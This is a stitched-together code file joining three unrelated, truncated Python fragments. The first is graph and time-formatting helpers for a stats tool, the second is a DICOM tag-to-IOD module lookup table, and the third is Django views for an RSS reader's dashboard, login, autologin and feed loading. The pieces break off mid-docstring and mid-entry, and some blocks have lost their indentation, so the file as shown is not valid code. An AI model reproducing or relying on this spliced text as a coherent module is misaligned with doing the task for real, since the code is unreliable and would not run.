        graph.title(self, text, "{font-size:20px; color:%s;}" % GRAPH_TITLE_COLOR)
    def bar_3d(self, color, name):
        # Bars with the shared opacity constant and a fixed size of 10.
        graph.bar_3d(self, GRAPH_BAR_OPACITY, color, name, 10)
    def set_y_legend(self, name):
        # 12pt legend in the shared label color.
        graph.set_y_legend(self, name, 12, GRAPH_LABEL_COLOR)
    def set_x_legend(self, name):
        # 12pt legend in the shared label color.
        graph.set_x_legend(self, name, 12, GRAPH_LABEL_COLOR)
class GraphObject(graph_object):
    """
    Override the default graph renderer.
    """
    def __init__(self, options):
        # Only the server path is kept from *options* (presumably the
        # parsed command-line options object -- confirm against callers).
        # NOTE(review): graph_object.__init__ is not called; confirm the
        # base class tolerates that.
        self.path = options.server_path
    def render(self, width, height, data_url):
        """
        Render this graph using the server path given to Simple Stats.
        """
        return graph_object.render(self, width, height, data_url, self.path + os.path.sep)
def title_constrain(title):
    """
    Constrain the length of a title to GRAPH_MAX_LABEL_LENGTH characters.
    Overlong titles keep their tail, prefixed with "...". The result is
    URL-escaped for graph use.
    """
    limit = GRAPH_MAX_LABEL_LENGTH
    if len(title) > limit:
        # Keep the last (limit - 3) characters so the ellipsis fits.
        title = "..." + title[3 - limit:]
    return quote(title)
def sec_to_str(sec):
    """
    Return a nice string given a number of seconds, such as 21:53. Takes
    into account hours, minutes, and seconds.

    Fixes over the previous version:
    - Uses floor division (``//``) so the result is correct under both
      Python 2 and Python 3 (the old ``/`` relied on py2 int division).
    - Zero-pads a unit whenever a larger unit precedes it, so 3600 is
      "1:00:00" rather than "1:0" and 3605 is "1:00:05" rather than "1:5".
    - Renames the local that shadowed the ``min`` builtin.

    Negative input returns "Unknown".
    """
    if sec < 0:
        return "Unknown"
    hours = sec // 3600
    minutes = (sec % 3600) // 60
    seconds = sec % 60
    s = ""
    if hours:
        # With hours shown, minutes are always two digits.
        s += "%d:%02d:" % (hours, minutes)
    elif minutes:
        s += "%d:" % minutes
    if hours or minutes:
        s += "%02d" % seconds
    else:
        # Bare seconds, no padding (e.g. "7").
        s += str(seconds)
    return s
def percent_to_str(percent):
    """
    Return a nice string given a percentage, e.g. 42 -> "42%".

    Negative input returns "Unknown"; fractional values are truncated
    toward zero by int(). (Removed a dead local ``s`` that was never used.)
    """
    if percent < 0:
        return "Unknown"
    return str(int(percent)) + "%"
def sanitize_filename(filename):
    """
    Return a sanitized file path with ':' and '/' each replaced by '_'.
    """
    return "".join("_" if char in ":/" else char for char in filename)
def query(query_string, data):
"""
Return a query string for use in HTML links. For example, if
query_string is "?page=foo" and data is "date=200807" this function
will return "?page=foo&date=200807" while if query_string were "" | |
['Series'],
'HEMODYNAMIC IOD': ['Series'],
'OPHTHALMIC AXIAL MEASUREMENTS IOD': ['Series'],
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Series'],
'VIDEO MICROSCOPIC IMAGE IOD': ['Series'],
'ENHANCED MR COLOR IMAGE IOD': ['Series'],
'ENHANCED CT IMAGE IOD': ['Series'],
'X-RAY RADIATION DOSE SR IOD': ['Series'],
'AUTOREFRACTION MEASUREMENTS IOD': ['Series'],
'PROCEDURE LOG IOD': ['Series'],
'IMPLANTATION PLAN SR DOCUMENT IOD': ['Series'],
'DIGITAL INTRA-ORAL X-RAY IMAGE IOD': ['Series'],
'STEREOMETRIC RELATIONSHIP IOD': ['Series'],
'INTRAOCULAR LENS CALCULATIONS IOD': ['Series'],
'X-RAY 3D CRANIOFACIAL IMAGE IOD': ['Series'],
'VL ENDOSCOPIC IMAGE IOD': ['Series'],
'KERATOMETRY MEASUREMENTS IOD': ['Series'],
'MULTI-FRAME SINGLE BIT SC IMAGE IOD': ['Series'],
'MULTI-FRAME GRAYSCALE BYTE SC IMAGE IOD': ['Series'],
'COMPREHENSIVE SR IOD': ['Series'],
'ENHANCED ULTRASOUND VOLUME IOD': ['Series'],
'KEY OBJECT SELECTION DOCUMENT IOD': ['Series'],
'SPATIAL FIDUCIALS IOD': ['Series'],
'RT ION PLAN IOD': ['Series'],
'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Series'],
'CT IMAGE IOD': ['Series'],
'VL WHOLE SLIDE MICROSCOPY IOD': ['Series'],
'RT ION BEAMS TREATMENT RECORD IOD': ['Series'],
'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Series'],
'XA/XRF GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Series'],
'RT DOSE IOD': ['Series'],
'AMBULATORY ECG IOD': ['Series'],
'SURFACE SEGMENTATION IOD': ['Series'],
'MAMMOGRAPHY CAD SR IOD': ['Series'],
'VL MICROSCOPIC IMAGE IOD': ['Series'],
'RT BEAMS TREATMENT RECORD IOD': ['Series'],
'DEFORMABLE SPATIAL REGISTRATION IOD': ['Series'],
'VIDEO PHOTOGRAPHIC IMAGE IOD': ['Series'],
'RT IMAGE IOD': ['Series'],
'SC IMAGE IOD': ['Series'],
None: ['Series'],
'SEGMENTATION IOD': ['Series'],
'PET IMAGE IOD': ['Series'],
'PSEUDO-COLOR SOFTCOPY PRESENTATION STATE IOD': ['Series'],
'DIGITAL X-RAY IMAGE IOD': ['Series'],
'REAL WORLD VALUE MAPPING IOD': ['Series'],
'SPATIAL REGISTRATION IOD': ['Series'],
'COLON CAD SR IOD': ['Series'],
'INTRAVASCULAR OCT IMAGE IOD': ['Series'],
'COLOR SOFTCOPY PRESENTATION STATE IOD': ['Series'],
'GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Series'],
'ENHANCED PET IMAGE IOD': ['Series'],
'VISUAL ACUITY MEASUREMENTS IOD': ['Series'],
'US MULTI-FRAME IMAGE IOD': ['Series'],
'ENHANCED X-RAY RF IMAGE IOD': ['Series'],
'RT BEAMS DELIVERY INSTRUCTION IOD': ['Series'],
'SUBJECTIVE REFRACTION MEASUREMENTS IOD': ['Series'],
'US IMAGE IOD': ['Series'],
'GENERAL ECG IOD': ['Series'],
'XRF IMAGE IOD': ['Series'],
'ENCAPSULATED CDA IOD': ['Series'],
'ENHANCED SR IOD': ['Series'],
'VL PHOTOGRAPHIC IMAGE IOD': ['Series'],
'GENERAL AUDIO WAVEFORM IOD': ['Series'],
'MR IMAGE IOD': ['Series'],
'OPHTHALMIC TOMOGRAPHY IMAGE IOD': ['Series'],
'VIDEO ENDOSCOPIC IMAGE IOD': ['Series'],
'ARTERIAL PULSE WAVEFORM IOD': ['Series'],
},
# ClinicalTrialSeriesDescription
0x00120072L: {
'BASIC STRUCTURED DISPLAY IOD': ['Series'],
'MULTI-FRAME TRUE COLOR SC IMAGE IOD': ['Series'],
'RT BRACHY TREATMENT RECORD IOD': ['Series'],
'RT STRUCTURE SET IOD': ['Series'],
'RT PLAN IOD': ['Series'],
'CR IMAGE IOD': ['Series'],
'RAW DATA IOD': ['Series'],
'MACULAR GRID THIICKNESS AND VOLUME REPORT IOD': ['Series'],
'ENHANCED MR IMAGE IOD': ['Series'],
'BASIC CARDIAC EP IOD': ['Series'],
'RT TREATMENT SUMMARY RECORD IOD': ['Series'],
'12-LEAD ECG IOD': ['Series'],
'RESPIRATORY WAVEFORM IOD': ['Series'],
'VL SLIDE-COORDINATES MICROSCOPIC IMAGE IOD': ['Series'],
'BREAST TOMOSYNTHESIS IMAGE IOD': ['Series'],
'BASIC VOICE AUDIO IOD': ['Series'],
'OPHTHALMIC PHOTOGRAPHY 16 BIT IMAGE IOD': ['Series'],
'ENHANCED X-RAY ANGIOGRAPHIC IMAGE IOD': ['Series'],
'OPHTHALMIC PHOTOGRAPHY 8 BIT IMAGE IOD': ['Series'],
'MULTI-FRAME GRAYSCALE WORD SC IMAGE IOD': ['Series'],
'SPECTACLE PRESCIPTION REPORT IOD': ['Series'],
'BASIC TEXT SR IOD': ['Series'],
'NM IMAGE IOD': ['Series'],
'BLENDING SOFTCOPY PRESENTATION STATE IOD': ['Series'],
'LENSOMETRY MEASUREMENTS IOD': ['Series'],
'MR SPECTROSCOPY IOD': ['Series'],
'ENCAPSULATED PDF IOD': ['Series'],
'X-RAY 3D ANGIOGRAPHIC IMAGE IOD': ['Series'],
'CHEST CAD SR IOD': ['Series'],
'HEMODYNAMIC IOD': ['Series'],
'OPHTHALMIC AXIAL MEASUREMENTS IOD': ['Series'],
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Series'],
'VIDEO MICROSCOPIC IMAGE IOD': ['Series'],
'ENHANCED MR COLOR IMAGE IOD': ['Series'],
'ENHANCED CT IMAGE IOD': ['Series'],
'X-RAY RADIATION DOSE SR IOD': ['Series'],
'AUTOREFRACTION MEASUREMENTS IOD': ['Series'],
'PROCEDURE LOG IOD': ['Series'],
'IMPLANTATION PLAN SR DOCUMENT IOD': ['Series'],
'DIGITAL INTRA-ORAL X-RAY IMAGE IOD': ['Series'],
'STEREOMETRIC RELATIONSHIP IOD': ['Series'],
'INTRAOCULAR LENS CALCULATIONS IOD': ['Series'],
'X-RAY 3D CRANIOFACIAL IMAGE IOD': ['Series'],
'VL ENDOSCOPIC IMAGE IOD': ['Series'],
'KERATOMETRY MEASUREMENTS IOD': ['Series'],
'MULTI-FRAME SINGLE BIT SC IMAGE IOD': ['Series'],
'MULTI-FRAME GRAYSCALE BYTE SC IMAGE IOD': ['Series'],
'COMPREHENSIVE SR IOD': ['Series'],
'ENHANCED ULTRASOUND VOLUME IOD': ['Series'],
'KEY OBJECT SELECTION DOCUMENT IOD': ['Series'],
'SPATIAL FIDUCIALS IOD': ['Series'],
'RT ION PLAN IOD': ['Series'],
'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Series'],
'CT IMAGE IOD': ['Series'],
'VL WHOLE SLIDE MICROSCOPY IOD': ['Series'],
'RT ION BEAMS TREATMENT RECORD IOD': ['Series'],
'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Series'],
'XA/XRF GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Series'],
'RT DOSE IOD': ['Series'],
'AMBULATORY ECG IOD': ['Series'],
'SURFACE SEGMENTATION IOD': ['Series'],
'MAMMOGRAPHY CAD SR IOD': ['Series'],
'VL MICROSCOPIC IMAGE IOD': ['Series'],
'RT BEAMS TREATMENT RECORD IOD': ['Series'],
'DEFORMABLE SPATIAL REGISTRATION IOD': ['Series'],
'VIDEO PHOTOGRAPHIC IMAGE IOD': ['Series'],
'RT IMAGE IOD': ['Series'],
'SC IMAGE IOD': ['Series'],
None: ['Series'],
'SEGMENTATION IOD': ['Series'],
'PET IMAGE IOD': ['Series'],
'PSEUDO-COLOR SOFTCOPY PRESENTATION STATE IOD': ['Series'],
'DIGITAL X-RAY IMAGE IOD': ['Series'],
'REAL WORLD VALUE MAPPING IOD': ['Series'],
'SPATIAL REGISTRATION IOD': ['Series'],
'COLON CAD SR IOD': ['Series'],
'INTRAVASCULAR OCT IMAGE IOD': ['Series'],
'COLOR SOFTCOPY PRESENTATION STATE IOD': ['Series'],
'GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Series'],
'ENHANCED PET IMAGE IOD': ['Series'],
'VISUAL ACUITY MEASUREMENTS IOD': ['Series'],
'US MULTI-FRAME IMAGE IOD': ['Series'],
'ENHANCED X-RAY RF IMAGE IOD': ['Series'],
'RT BEAMS DELIVERY INSTRUCTION IOD': ['Series'],
'SUBJECTIVE REFRACTION MEASUREMENTS IOD': ['Series'],
'US IMAGE IOD': ['Series'],
'GENERAL ECG IOD': ['Series'],
'XRF IMAGE IOD': ['Series'],
'ENCAPSULATED CDA IOD': ['Series'],
'ENHANCED SR IOD': ['Series'],
'VL PHOTOGRAPHIC IMAGE IOD': ['Series'],
'GENERAL AUDIO WAVEFORM IOD': ['Series'],
'MR IMAGE IOD': ['Series'],
'OPHTHALMIC TOMOGRAPHY IMAGE IOD': ['Series'],
'VIDEO ENDOSCOPIC IMAGE IOD': ['Series'],
'ARTERIAL PULSE WAVEFORM IOD': ['Series'],
},
# InstanceNumber
0x00200013L: {
'HANGING PROTOCOL IOD': ['Hanging Protocol'],
'BASIC STRUCTURED DISPLAY IOD': ['Presentation State'],
'MULTI-FRAME TRUE COLOR SC IMAGE IOD': ['Image'],
'RT BRACHY TREATMENT RECORD IOD': ['Treatment Record'],
'RT ION MACHINE VERIFICATION IOD': ['Rt Ion Machine Verification'],
'RT STRUCTURE SET IOD': ['Structure Set'],
'RT PLAN IOD': ['Plan'],
'FILM SESSION IOD': ['Film Session'],
'BASIC FILM BOX IOD': ['Basic Film Box'],
'CR IMAGE IOD': ['Image'],
'RAW DATA IOD': ['Raw Data'],
'MACULAR GRID THIICKNESS AND VOLUME REPORT IOD': ['Document'],
'ENHANCED MR IMAGE IOD': ['Image'],
'UNIFIED PROCEDURE STEP IOD': ['Unified Procedure Step'],
'BASIC CARDIAC EP IOD': ['Waveform'],
'RT TREATMENT SUMMARY RECORD IOD': ['Treatment Record'],
'MODALITY PERFORMED PROCEDURE STEP IOD': ['Modality Performed Procedure Step'],
'12-LEAD ECG IOD': ['Waveform'],
'RESPIRATORY WAVEFORM IOD': ['Waveform'],
'VL SLIDE-COORDINATES MICROSCOPIC IMAGE IOD': ['Image'],
'BREAST TOMOSYNTHESIS IMAGE IOD': ['Image'],
'BASIC VOICE AUDIO IOD': ['Waveform'],
'OPHTHALMIC PHOTOGRAPHY 16 BIT IMAGE IOD': ['Image'],
'ENHANCED X-RAY ANGIOGRAPHIC IMAGE IOD': ['Image'],
'OPHTHALMIC PHOTOGRAPHY 8 BIT IMAGE IOD': ['Image'],
'COLOR PALETTE IOD': ['Color Palette'],
'MULTI-FRAME GRAYSCALE WORD SC IMAGE IOD': ['Image'],
'SPECTACLE PRESCIPTION REPORT IOD': ['Document'],
'BASIC TEXT SR IOD': ['Document'],
'NM IMAGE IOD': ['Image'],
'BLENDING SOFTCOPY PRESENTATION STATE IOD': ['Presentation State'],
'LENSOMETRY MEASUREMENTS IOD': ['Equipment'],
'MR SPECTROSCOPY IOD': ['Equipment'],
'ENCAPSULATED PDF IOD': ['Encapsulated Document'],
'X-RAY 3D ANGIOGRAPHIC IMAGE IOD': ['Image'],
'CHEST CAD SR IOD': ['Document'],
'HEMODYNAMIC IOD': ['Waveform'],
'OPHTHALMIC AXIAL MEASUREMENTS IOD': ['Equipment'],
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Image'],
'VIDEO MICROSCOPIC IMAGE IOD': ['Image'],
'ENHANCED MR COLOR IMAGE IOD': ['Image'],
'INSTANCE AVAILABILITY NOTIFICATION IOD': ['Instance Availability Notification'],
'X-RAY RADIATION DOSE SR IOD': ['Document'],
'AUTOREFRACTION MEASUREMENTS IOD': ['Equipment'],
'GENERIC IMPLANT TEMPLATE IOD': ['Implant Template'],
'IMPLANTATION PLAN SR DOCUMENT IOD': ['Document'],
'SPATIAL REGISTRATION IOD': ['Spatial Registration'],
'ENHANCED X-RAY RF IMAGE IOD': ['Image'],
'INTRAOCULAR LENS CALCULATIONS IOD': ['Equipment'],
'X-RAY 3D CRANIOFACIAL IMAGE IOD': ['Image'],
'VL ENDOSCOPIC IMAGE IOD': ['Image'],
'KERATOMETRY MEASUREMENTS IOD': ['Equipment'],
'MULTI-FRAME SINGLE BIT SC IMAGE IOD': ['Image'],
'MULTI-FRAME GRAYSCALE BYTE SC IMAGE IOD': ['Image'],
'COMPREHENSIVE SR IOD': ['Document'],
'ENHANCED ULTRASOUND VOLUME IOD': ['Image'],
'KEY OBJECT SELECTION DOCUMENT IOD': ['Series', 'Document'],
'SPATIAL FIDUCIALS IOD': ['Spatial Fiducials'],
'RT ION PLAN IOD': ['Plan'],
'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Image'],
'CT IMAGE IOD': ['Image'],
'ENHANCED CT IMAGE IOD': ['Image'],
'PRINT JOB IOD': ['Print Job'],
'RT CONVENTIONAL MACHINE VERIFICATION IOD': ['Rt Conventional Machine Verification'],
'VL WHOLE SLIDE MICROSCOPY IOD': ['Image'],
'RT ION BEAMS TREATMENT RECORD IOD': ['Treatment Record'],
'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Measurements'],
'XA/XRF GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Presentation State'],
'RT DOSE IOD': ['Dose'],
'BASIC ANNOTATION BOX IOD': ['Basic Annotation Box'],
'GENERAL PURPOSE PERFORMED PROCEDURE STEP IOD': ['General Purpose Performed Procedure Step'],
'AMBULATORY ECG IOD': ['Waveform'],
'PRINTER IOD': ['Printer'],
'PRINTER CONFIGURATION IOD': ['Printer Configuration'],
'SURFACE SEGMENTATION IOD': ['Surface'],
'MAMMOGRAPHY CAD SR IOD': ['Document'],
'VL MICROSCOPIC IMAGE IOD': ['Image'],
'RT BEAMS TREATMENT RECORD IOD': ['Treatment Record'],
'DEFORMABLE SPATIAL REGISTRATION IOD': ['Deformable Registration'],
'IMPLANT ASSEMBLY TEMPLATE | |
# <gh_stars>1-10  (dataset scraper artifact, not part of the original module)
import datetime
import time
import boto
import redis
import requests
import random
import zlib
from django.shortcuts import get_object_or_404
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.template.loader import render_to_string
from django.db import IntegrityError
from django.db.models import Q
from django.views.decorators.cache import never_cache
from django.core.urlresolvers import reverse
from django.contrib.auth import login as login_user
from django.contrib.auth import logout as logout_user
from django.contrib.auth.models import User
from django.http import HttpResponse, HttpResponseRedirect, HttpResponseForbidden, Http404, UnreadablePostError
from django.conf import settings
from django.core.mail import mail_admins
#from django.core.validators import email_re
from django.core.validators import EmailValidator
from django.core.exceptions import ValidationError
from django.core.validators import validate_email
from django.core.mail import EmailMultiAlternatives
from django.contrib.sites.models import Site
from django.utils import feedgenerator
from django.utils.encoding import smart_unicode
from mongoengine.queryset import OperationError
from mongoengine.queryset import NotUniqueError
from apps.recommendations.models import RecommendedFeed
from apps.analyzer.models import MClassifierTitle, MClassifierAuthor, MClassifierFeed, MClassifierTag
from apps.analyzer.models import apply_classifier_titles, apply_classifier_feeds
from apps.analyzer.models import apply_classifier_authors, apply_classifier_tags
from apps.analyzer.models import get_classifiers_for_user, sort_classifiers_by_feed
from apps.profile.models import Profile
from apps.reader.models import UserSubscription, UserSubscriptionFolders, RUserStory, Feature
from apps.reader.forms import SignupForm, LoginForm, FeatureForm
from apps.rss_feeds.models import MFeedIcon, MStarredStoryCounts
from apps.search.models import MUserSearch
from apps.statistics.models import MStatistics
# from apps.search.models import SearchStarredStory
try:
from apps.rss_feeds.models import Feed, MFeedPage, DuplicateFeed, MStory, MStarredStory
except:
pass
from apps.social.models import MSharedStory, MSocialProfile, MSocialServices
from apps.social.models import MSocialSubscription, MActivity, MInteraction
from apps.categories.models import MCategory
from apps.social.views import load_social_page
from apps.rss_feeds.tasks import ScheduleImmediateFetches
from utils import json_functions as json
from utils.user_functions import get_user, ajax_login_required
from utils.feed_functions import relative_timesince
from utils.story_functions import format_story_link_date__short
from utils.story_functions import format_story_link_date__long
from utils.story_functions import strip_tags
from utils import log as logging
from utils.view_functions import get_argument_or_404, render_to, is_true
from utils.view_functions import required_params
from utils.ratelimit import ratelimit
from vendor.timezones.utilities import localtime_for_timezone
# Domain blocklist; the consuming code is outside this chunk --
# presumably feeds from these domains are refused. TODO confirm callers.
BANNED_URLS = [
    "brentozar.com",
]
@never_cache
@render_to('reader/dashboard.xhtml')
def index(request, **kwargs):
    """
    Front-door dispatcher. A GET on a username subdomain serves that
    user's social page; otherwise anonymous visitors get the welcome
    page and logged-in users get the dashboard.
    """
    subdomain = request.subdomain
    if request.method == "GET" and subdomain and subdomain not in ('dev', 'www', 'debug'):
        # "user.host.tld" -> "user"
        username = subdomain.split('.')[0] if '.' in subdomain else subdomain
        matches = User.objects.filter(username=username)
        if not matches:
            # Fall back to a case-insensitive lookup.
            matches = User.objects.filter(username__iexact=username)
        if not matches:
            # Unknown subdomain: bounce to the canonical index.
            return HttpResponseRedirect('http://%s%s' % (
                Site.objects.get_current().domain,
                reverse('index')))
        return load_social_page(request, user_id=matches[0].pk,
                                username=subdomain, **kwargs)
    if request.user.is_anonymous():
        return welcome(request, **kwargs)
    return dashboard(request, **kwargs)
def dashboard(request, **kwargs):
    """
    Build the template context for the logged-in dashboard
    (reader/dashboard.xhtml). Inactive accounts are redirected to the
    payment form instead.
    """
    user = request.user
    subscription_count = UserSubscription.objects.filter(user=user).count()
    promoted = (RecommendedFeed.objects
                .filter(is_public=True, approved_date__lte=datetime.datetime.now())
                .select_related('feed')[:2])
    pending = []
    if user.is_staff:
        # Staff also see feeds awaiting moderation.
        pending = (RecommendedFeed.objects
                   .filter(is_public=False, declined_date__isnull=True)
                   .select_related('feed')[:2])
    stats = MStatistics.all()
    profile_social = MSocialProfile.get_user(user.pk)
    # One-shot session flag: consume it if set.
    google_import = request.session.get('import_from_google_reader', False)
    if google_import:
        del request.session['import_from_google_reader']
    if not user.is_active:
        # Inactive accounts are sent to the payment form (stripe-form).
        return HttpResponseRedirect("https://%s%s" % (
            Site.objects.get_current().domain,
            reverse('stripe-form')))
    logging.user(request, "~FBLoading dashboard")
    context = {
        'user_profile': user.profile,
        'feed_count': subscription_count,
        'account_images': range(1, 4),
        'recommended_feeds': promoted,
        'unmoderated_feeds': pending,
        'statistics': stats,
        'social_profile': profile_social,
        'start_import_from_google_reader': google_import,
        'debug': settings.DEBUG,
    }
    return context, "reader/dashboard.xhtml"
def welcome(request, **kwargs):
    """
    Build the template context for the logged-out welcome page, binding
    POST data to whichever form (login or signup) was submitted.
    """
    user = get_user(request)
    is_post = request.method == "POST"
    # The submit button value distinguishes "log in" from "sign up".
    logging_in = is_post and request.POST.get('submit', '').startswith('log')
    signing_up = is_post and not logging_in
    login_form = (LoginForm(request.POST, prefix='login')
                  if logging_in else LoginForm(prefix='login'))
    signup_form = (SignupForm(request.POST, prefix='signup')
                   if signing_up else SignupForm(prefix='signup'))
    logging.user(request, "~FBLoading welcome")
    return {
        'user_profile': hasattr(user, 'profile') and user.profile,
        'login_form': login_form,
        'signup_form': signup_form,
        'statistics': MStatistics.all(),
        'social_profile': MSocialProfile.get_user(user.pk),
        'post_request': is_post,
    }, "reader/welcome.xhtml"
@never_cache
def login(request):
    """
    Handle the login form. API clients get a JSON {code, message}
    response; browser logins redirect to the index.
    """
    code = -1
    message = ""
    if request.method == "POST":
        form = LoginForm(request.POST, prefix='login')
        if not form.is_valid():
            # Surface the first validation error message.
            message = form.errors.items()[0][1][0]
        else:
            login_user(request, form.get_user())
            if request.POST.get('api'):
                logging.user(form.get_user(), "~FG~BB~SKiPhone Login~FW")
                code = 1
            else:
                logging.user(form.get_user(), "~FG~BBLogin~FW")
                return HttpResponseRedirect(reverse('index'))
    if request.POST.get('api'):
        payload = json.encode(dict(code=code, message=message))
        return HttpResponse(payload, content_type='application/json')
    return index(request)
@never_cache
def signup(request):
    """
    Create an account from the signup form and log the new user in.
    Invalid submissions and GETs fall through to the index page.
    """
    if request.method != "POST":
        return index(request)
    form = SignupForm(prefix='signup', data=request.POST)
    if form.is_valid():
        user = form.save()
        login_user(request, user)
        logging.user(user, "~FG~SB~BBNEW SIGNUP: ~FW%s" % user.email)
        if not user.is_active:
            # Inactive accounts are sent to the payment form (stripe-form).
            destination = "https://%s%s" % (Site.objects.get_current().domain,
                                            reverse('stripe-form'))
            return HttpResponseRedirect(destination)
    return index(request)
@never_cache
def logout(request):
    """
    End the current session. API callers get a JSON acknowledgement;
    everyone else is redirected to the index.
    """
    logging.user(request, "~FG~BBLogout~FW")
    logout_user(request)
    if not request.GET.get('api'):
        return HttpResponseRedirect(reverse('index'))
    return HttpResponse(json.encode(dict(code=1)), content_type='application/json')
def autologin(request, username, secret):
    """
    Log a user in from a secret-token link, then redirect.

    Returns 403 unless both the username and its matching secret token
    are supplied and found. The optional ?next= parameter controls the
    post-login destination.
    """
    destination = request.GET.get('next', '')
    if not (username and secret):
        return HttpResponseForbidden()
    profiles = Profile.objects.filter(user__username=username, secret_token=secret)
    if not profiles:
        return HttpResponseForbidden()
    user = profiles[0].user
    # Django needs a backend annotation when logging in without authenticate().
    user.backend = settings.AUTHENTICATION_BACKENDS[0]
    login_user(request, user)
    logging.user(user, "~FG~BB~SKAuto-Login. Next stop: %s~FW" % (destination if destination else 'Homepage',))
    if destination and not destination.startswith('/'):
        # A relative keyword becomes a ?next= parameter on the index.
        return HttpResponseRedirect(reverse('index') + '?next=' + destination)
    if destination:
        return HttpResponseRedirect(destination)
    return HttpResponseRedirect(reverse('index'))
@ratelimit(minutes=1, requests=60)
@never_cache
@json.json_view
def load_feeds(request):
    """Return the user's feeds, folders, social feeds and starred counts.

    Side effects: recalculates unread scores when ``update_counts`` is
    set, and schedules immediate fetches for feeds that look stale or
    inactive.  Delegates to ``load_feeds_flat`` when ``flat`` is set.
    """
    user = get_user(request)
    feeds = {}
    include_favicons = request.REQUEST.get('include_favicons', False)
    flat = request.REQUEST.get('flat', False)
    update_counts = request.REQUEST.get('update_counts', False)
    # v2 clients receive feeds as a list instead of a dict (see `data`).
    version = int(request.REQUEST.get('v', 1))
    # Query params arrive as strings; treat the literal 'false' as False.
    if include_favicons == 'false': include_favicons = False
    if update_counts == 'false': update_counts = False
    if flat == 'false': flat = False
    if flat: return load_feeds_flat(request)
    try:
        folders = UserSubscriptionFolders.objects.get(user=user)
    except UserSubscriptionFolders.DoesNotExist:
        # No folder structure yet: nothing to load.
        data = dict(feeds=[], folders=[])
        return data
    except UserSubscriptionFolders.MultipleObjectsReturned:
        # Duplicate folder rows: keep the first, delete the rest, retry.
        UserSubscriptionFolders.objects.filter(user=user)[1:].delete()
        folders = UserSubscriptionFolders.objects.get(user=user)
    user_subs = UserSubscription.objects.select_related('feed').filter(user=user)
    day_ago = datetime.datetime.now() - datetime.timedelta(days=1)
    scheduled_feeds = []
    for sub in user_subs:
        pk = sub.feed_id
        if update_counts and sub.needs_unread_recalc:
            sub.calculate_feed_scores(silent=True)
        feeds[pk] = sub.canonical(include_favicon=include_favicons)
        # Only active subscriptions influence fetch scheduling.
        if not sub.active: continue
        # Queue feeds that are inactive (without a known exception),
        # have no active subscribers, or are overdue for an update.
        if not sub.feed.active and not sub.feed.has_feed_exception:
            scheduled_feeds.append(sub.feed.pk)
        elif sub.feed.active_subscribers <= 0:
            scheduled_feeds.append(sub.feed.pk)
        elif sub.feed.next_scheduled_update < day_ago:
            scheduled_feeds.append(sub.feed.pk)
    if len(scheduled_feeds) > 0 and request.user.is_authenticated():
        logging.user(request, "~SN~FMTasking the scheduling immediate fetch of ~SB%s~SN feeds..." %
                     len(scheduled_feeds))
        ScheduleImmediateFetches.apply_async(kwargs=dict(feed_ids=scheduled_feeds, user_id=user.pk))
    starred_counts, starred_count = MStarredStoryCounts.user_counts(user.pk, include_total=True)
    # Counts collection may be stale/empty; fall back to a direct count.
    if not starred_count and len(starred_counts):
        starred_count = MStarredStory.objects(user_id=user.pk).count()
    social_params = {
        'user_id': user.pk,
        'include_favicon': include_favicons,
        'update_counts': update_counts,
    }
    social_feeds = MSocialSubscription.feeds(**social_params)
    social_profile = MSocialProfile.profile(user.pk)
    social_services = MSocialServices.profile(user.pk)
    # Offer category suggestions only to users without subscriptions.
    categories = None
    if not user_subs:
        categories = MCategory.serialize()
    logging.user(request, "~FB~SBLoading ~FY%s~FB/~FM%s~FB feeds/socials%s" % (
        len(feeds.keys()), len(social_feeds), '. ~FCUpdating counts.' if update_counts else ''))
    data = {
        'feeds': feeds.values() if version == 2 else feeds,
        'social_feeds': social_feeds,
        'social_profile': social_profile,
        'social_services': social_services,
        'user_profile': user.profile,
        "is_staff": user.is_staff,
        'user_id': user.pk,
        'folders': json.decode(folders.folders),
        'starred_count': starred_count,
        'starred_counts': starred_counts,
        'categories': categories
    }
    return data
@json.json_view
def load_feed_favicons(request):
    """Return a mapping of feed_id -> favicon data for the requested
    ``feed_ids``, defaulting to all of the user's active subscriptions
    when none are given."""
    user = get_user(request)
    feed_ids = request.REQUEST.getlist('feed_ids')
    if not feed_ids:
        active_subs = UserSubscription.objects.select_related('feed').filter(user=user, active=True)
        feed_ids = [row['feed__pk'] for row in active_subs.values('feed__pk')]
    icons = MFeedIcon.objects(feed_id__in=feed_ids)
    return {icon.feed_id: icon.data for icon in icons}
def load_feeds_flat(request):
    """Return the user's feeds and folders in a flattened structure,
    used by mobile clients (response carries iOS version metadata).

    Side effects: may auto-activate subscriptions, recalculates unread
    scores when ``update_counts`` is set, and schedules immediate
    fetches for stale/inactive feeds.
    """
    user = request.user
    include_favicons = is_true(request.REQUEST.get('include_favicons', False))
    update_counts = is_true(request.REQUEST.get('update_counts', True))
    include_inactive = is_true(request.REQUEST.get('include_inactive', False))
    feeds = {}
    inactive_feeds = {}
    day_ago = datetime.datetime.now() - datetime.timedelta(days=1)
    scheduled_feeds = []
    iphone_version = "2.1" # Preserved forever. Don't change.
    latest_ios_build = "52"
    latest_ios_version = "5.0.0b2"
    # NOTE(review): these params were already coerced by is_true() above,
    # so the 'false' string comparisons look vestigial — confirm
    # is_true()'s return type before removing.
    if include_favicons == 'false': include_favicons = False
    if update_counts == 'false': update_counts = False
    if not user.is_authenticated():
        return HttpResponseForbidden()
    try:
        folders = UserSubscriptionFolders.objects.get(user=user)
    except UserSubscriptionFolders.DoesNotExist:
        folders = []
    user_subs = UserSubscription.objects.select_related('feed').filter(user=user, active=True)
    # No active subscriptions but a folder structure exists: re-activate
    # and reload.
    if not user_subs and folders:
        folders.auto_activate()
        user_subs = UserSubscription.objects.select_related('feed').filter(user=user, active=True)
    if include_inactive:
        inactive_subs = UserSubscription.objects.select_related('feed').filter(user=user, active=False)
    for sub in user_subs:
        if update_counts and sub.needs_unread_recalc:
